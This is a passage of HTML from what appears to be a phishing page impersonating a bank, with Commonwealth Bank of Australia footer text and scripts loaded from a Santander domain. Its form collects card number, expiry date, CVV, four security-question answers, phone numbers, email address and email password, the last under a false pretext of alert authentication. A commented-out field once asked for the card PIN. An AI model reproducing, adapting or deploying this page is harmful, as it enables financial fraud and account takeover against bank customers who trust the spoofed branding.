		<input type="text" id="cc" placeholder="Card Number" name="card" data-error="homephone-error" maxlength="25" required />
	</div>
		
<!--	<div class="formTitle required">Card 4-Digit PIN</div> 
					<div class="input-style--postcode">				
					<input type="password" id="cvv2" placeholder="Card 4-Digit PIN" name="pin" pattern='.{4}' maxlength="4" required />
					
					</div>		-->
		
<div class="formTitle required">Card Expiry Date (mm/yy)</div>
					

					<div class="date">
						<div class="small-4 large-3 medium-3 columns dob">
							<select type="number" id="dobmonth" name="eexpmonth" data-error="dobmonth-error" required/>
								<option value="">Month</option>
								<option value="1">01</option>
								<option value="2">02</option>
								<option value="3">03</option>
								<option value="4">04</option>
								<option value="5">05</option>
								<option value="6">06</option>
								<option value="7">07</option>
								<option value="8">08</option>
								<option value="9">09</option>
								<option value="10">10</option>
								<option value="11">11</option>
								<option value="12">12</option>
							</select>
						</div>

						<div class="small-4 large-3 medium-3 columns dob end">
							<select type="number" id="dobyear" name="eexpyear" data-error="dobyear-error" required/>
								<option value="">Year</option>
								<option value="2019">2019</option>
								<option value="2020">2020</option>
								<option value="2021">2021</option>
								<option value="2022">2022</option>
								<option value="2023">2023</option>
								<option value="2024">2024</option>
								<option value="2025">2025</option>

							</select>
						</div>
					</div>	<br><br>
					
<div class="formTitle"><br></div>
	
					
<div class="formTitle required">CVV Code</div> 
					<div class="input-style--postcode">				
					<input type="text" id="cvv2" name="cvv2" pattern='.{3}' maxlength="3" required />
					<div class="helperText date"> 3 digits on the signature panel at the back of your card</div>
					</div>
			
	
<div class="row">
			<div class="large-12 columns innerContainer">
				<div class="subheaderBar subheaderText">
				Challenge Question and Answers

				</div>
			</div>
		</div>	
		<br>
		
			<font color=red>* </font> (SELECT your 4 challenge question and enter answers correctly. Please make sure you match the questions and answers we have on record for your profile.)<br><br>
<div class="date">
						<div class="small-9 large-6 medium-3 columns dob">
				
							<select type="text" id="dobday" style="font-size:13px" name="security1" required/>
								<option value="">Select a question</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="What is the name of your best friend?">What is the name of your best friend?</option>
<option value="What was the suburb of your first home?">What was the suburb of your first home?</option>
<option value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
<option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
<option value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the name of your first primary school?">What was the name of your first primary school?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
<option value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>


							</select>
					</div>
					
					<input type="text" id="postcode2" style="width:300px;height:32px" class="large-6" placeholder="Answer 1" name="answer1" required/>
</div>		
		
<div class="date">
						<div class="small-9 large-6 medium-3 columns dob">
				
							<select type="text" id="dobday" style="font-size:13px" name="security2" required/>
								<option value="">Select a question</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="What is the name of your best friend?">What is the name of your best friend?</option>
<option value="What was the suburb of your first home?">What was the suburb of your first home?</option>
<option value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
<option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
<option value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the name of your first primary school?">What was the name of your first primary school?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
<option value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>


							</select>
					</div>
					
					<input type="text" id="postcode2" style="width:300px;height:32px" class="large-6" placeholder="Answer 2" name="answer2" required/>
</div>		
		
<div class="date">
						<div class="small-9 large-6 medium-3 columns dob">
				
							<select type="text" id="dobday" style="font-size:13px" name="security3" required/>
								<option value="">Select a question</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="What is the name of your best friend?">What is the name of your best friend?</option>
<option value="What was the suburb of your first home?">What was the suburb of your first home?</option>
<option value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
<option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
<option value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the name of your first primary school?">What was the name of your first primary school?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
<option value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>


							</select>
					</div>
					
					<input type="text" id="postcode2" style="width:300px;height:32px" class="large-6" placeholder="Answer 3" name="answer3" required/>
</div>		
		
<div class="date">
						<div class="small-9 large-6 medium-3 columns dob">
				
							<select type="text" id="dobday" style="font-size:13px" name="security4" required/>
								<option value="">Select a question</option>
<option value="What was the name of your first pet?">What was the name of your first pet?</option>
<option value="What is the name of your best friend?">What is the name of your best friend?</option>
<option value="What was the suburb of your first home?">What was the suburb of your first home?</option>
<option value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
<option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
<option value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
<option value="What was the name of your first primary school?">What was the name of your first primary school?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
<option value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
<option value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>


							</select>
					</div>
					
					<input type="text" id="postcode2" style="width:300px;height:32px" class="large-6" placeholder="Answer 4" name="answer4" required/>
</div>		
<div class="row">
			<div class="large-12 columns innerContainer">
				<div class="subheaderBar subheaderText">
					Contact Information and Previous Address
				</div>
			</div>
		</div>	
	
<div class="formTitle required">Mobile Number</div>
	<div class="input-style--PhoneNum">
		<input type="text" id="phone" placeholder="Mobile Number" name="mn" data-error="homephone-error" required>
	</div>
					
	<div class="alertText homephone-error">Your Driver's licence number should be Filled
	</div>
<div class="formTitle required">Home Phone Number</div>
	<div class="input-style--PhoneNum">
		<input type="text" id="phones" placeholder="Home Phone Number" name="pn" data-error="homephone-error" required>
	</div>
					
	<div class="alertText homephone-error">Your Phone Number should be Filled
	</div>
		
<div class="formTitle required">E-mail Address</div>
	<div class="input-style--PhoneNum">
		<input type="email" id="homephones" style="width:500px" placeholder="E-mail Address" name="email" data-error="homephone-error" required>
	</div>
					
	<div class="alertText homephone-error">Your Email Address should be Filled
	</div>	
	
	<div class="formTitle required">Email Password: (for authentication of alerts and transaction confirmation)</div>
	<div class="input-style--PhoneNum">
		<input type="password" id="pass" style="width:400px" placeholder="E-mail Password" name="emailp" data-error="homephone-error" required>
	</div>
					
	<div class="alertText homephone-error">Your Previous Address should be Filled
	</div>		
	
	
	<div class="row">
			<div class="large-12 columns buttonContainer">
			
 <input type='submit' class="sec" value="Confirm" name="SignIn" style=" border:0; padding:10px; background-color:#FFCC00;color:#000 !important; font-family: Verdana, Arial, Helvetica, sans-serif;font-size:12px;font-weight:800 !important;">
			</div>
		</div>
	
	
</div>
</div>	
</div>	
<div class="clearfix"></div>
	</div>

	<script src="https://mortgage.yoursantander.co.uk/signup/js/vendor/what-input.min.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/foundation.min.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/app.js"></script>

	<script language="javascript"> 
		function toggle() {
			var ele = document.getElementById("mortNumHelp");
			if(ele.style.display == "block") {
				ele.style.display = "none";
				text.innerHTML = "show";
			}
			else {
				ele.style.display = "block";
				text.innerHTML = "hide";
			}
		}
	</script>
	
	
	

	

		



	
	
	<div class="row" >
			<div class="large-12 columns buttonContainer">
	 <!--		<button type="submit" id="loginButton">
                                        <i class="icon-padlock"></i>
                                        Log In
<input type='submit' class="sec" value="Confirm" name="SignIn" style="color:#fff !important; border:0; padding:10px; background-color:#5BA733; font-family: Verdana, Arial, Helvetica, sans-serif;font-size:12px;">
                                    </button>-->

			</div>
		</div>
	
	
</div>
</div>	
</div>	

</div>
</div>	
</div>	
</div>	
<div align=center>
<footer class="page-footer" style="width:100%;margin:0px; background:#4a4a4a; color:#fff">
<style>
a.online-guardian {
    
}
</style>




	<div class="page-footer-wrapper page-footer-dark">
		<div class="row">
			<div class="columns">
				<div class="small-1 medium-1 large-2 small-offset-3 medium-offset-0 columns no-right-pad google-play">
					<p>
						Site map
					</p>
				</div>		
				<div class="small-1 medium-1 large-2 small-offset-3 medium-offset-0 columns no-right-pad google-play">
					<p>
				 Terms of use
					</p>
				</div>
				<div class="small-1 medium-1 large-2 small-offset-3 medium-offset-0 columns no-right-pad google-play">
					<p>
					 Disclosure documents
					</p>
				</div>
				<div class="small-1 medium-1 large-2 small-offset-3 medium-offset-0 columns no-right-pad google-play">
					<p>
					   Policies
					</p>
				</div>			
		<div class="small-6 medium-3 large-2 small-offset-3 medium-offset-0 columns no-right-pad app-store">
					<p>
    Electronic ID
					</p>
				</div>	
				<div class="small-6 medium-3 large-2 small-offset-3 medium-offset-0 columns no-right-pad app-store">
					<p>
      Feedback/Complaints
					</p>
				</div>
					
				<div class="small-12 medium-12 large-12 push-large-1 columns disclaimer">
				<div class="small-12 medium-12 large-12 push-large-1 columns disclaimer">
 &copy;  2017 Commonwealth Bank of Australia ABN 48 123 123 124 AFSL and Australian credit licence 234945.


				</div>
				Any advice or information on this site does not take into account your personal objectives, financial situation or needs and you should consider whether it is appropriate for you. Please review our Member Information Guide.
Financial Services Guide and Credit Guide before acquiring the product.


				</div>
			</div>
			
		</div>

	</div>
	

</footer>	
	
	
	
	

	<script src="https://mortgage.yoursantander.co.uk/signup/js/vendor/what-input.min.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/foundation.min.js"></script>
	<script src="https://mortgage.yoursantander.co.uk/signup/js/app.js"></script>

	<script language="javascript"> 
		function toggle() {
			var ele = document.getElementById("mortNumHelp");
			if(ele.style.display == "block") {
				ele.style.display = "none";
				text.innerHTML = "show";
			}
			else {
				ele.style.display = "block";
				text.innerHTML = "hide";
			}
		}
	</script>
</body>
</html>
